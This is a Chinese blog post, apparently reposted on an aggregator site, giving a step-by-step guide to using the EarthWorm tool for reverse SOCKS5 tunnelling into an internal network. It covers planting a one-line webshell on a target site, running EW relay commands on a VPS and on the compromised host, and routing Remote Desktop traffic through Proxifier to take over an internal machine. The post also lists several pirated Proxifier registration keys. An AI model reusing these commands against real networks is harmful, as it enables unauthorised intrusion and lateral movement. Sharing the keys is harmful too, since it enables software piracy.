EW之Socks5反向代理内网穿透
Posted Sweetie_x
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了EW之Socks5反向代理内网穿透相关的知识,希望对你有一定的参考价值。
EW(earthworm)功能介绍
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。
准备阶段
在靶机网站上传一句话马使用蚁剑连接
ipconfig /all
一台外网vps:110.42.229.X
一台内网靶机:192.168.1.5(3389开放)
内网机器(无公网ip需要反弹到公网,需要在vps监听
vps服务端执行:
./ew_for_linux64 -s rcsocks -l 6666 -e 6667
这条命令的意思是说让公网服务器监听6666和6667端口,等待攻击者机器访问6666端口,目标机器访问6667端口。
如果机器报错:
Error: bind port xxxx
则可能是因为该端口被进程占用,查询占用进程,杀掉该进程,重新执行命令即可。
lsof -i:xxxx
内网机器执行:
ew_for_Win.exe -s rssocks -d vps的ip -e 6667
使用方式:sock5代理访问的6666端口
火狐添加代理
访问192.168.1.5
可以访问内网,实现内网穿透
使用proxifier代理
Proxifier Standard 版本注册码:
QBZ9F-D3VWW-BQ7YC-XUKWY-RB95P
D6ZMK-HY6A3-LYR3S-8U8KA-YEE6E
AVZCR-B2SKY-FEYW3-8AR76-2R5ZG
C8ZXW-D2TW8-QL7WV-U3PH7-38L4H
vps的IP和刚刚的6666端口
添加规则
localhost改为direct
添加程序与路由–browse 选择mstsc.exe
即可
拿下内网主机
以上是关于EW之Socks5反向代理内网穿透的主要内容,如果未能解决你的问题,请参考以下文章
红蓝对抗之隧道技术第二篇(reGeorg内网穿透SSH隧道本地Socks代理SSH远程转发Earthworm Socks5代理Tunna正向代理ICMP隧道DNS隧道Frp穿透)
红蓝对抗之隧道技术第二篇(reGeorg内网穿透SSH隧道本地Socks代理SSH远程转发Earthworm Socks5代理Tunna正向代理ICMP隧道DNS隧道Frp穿透)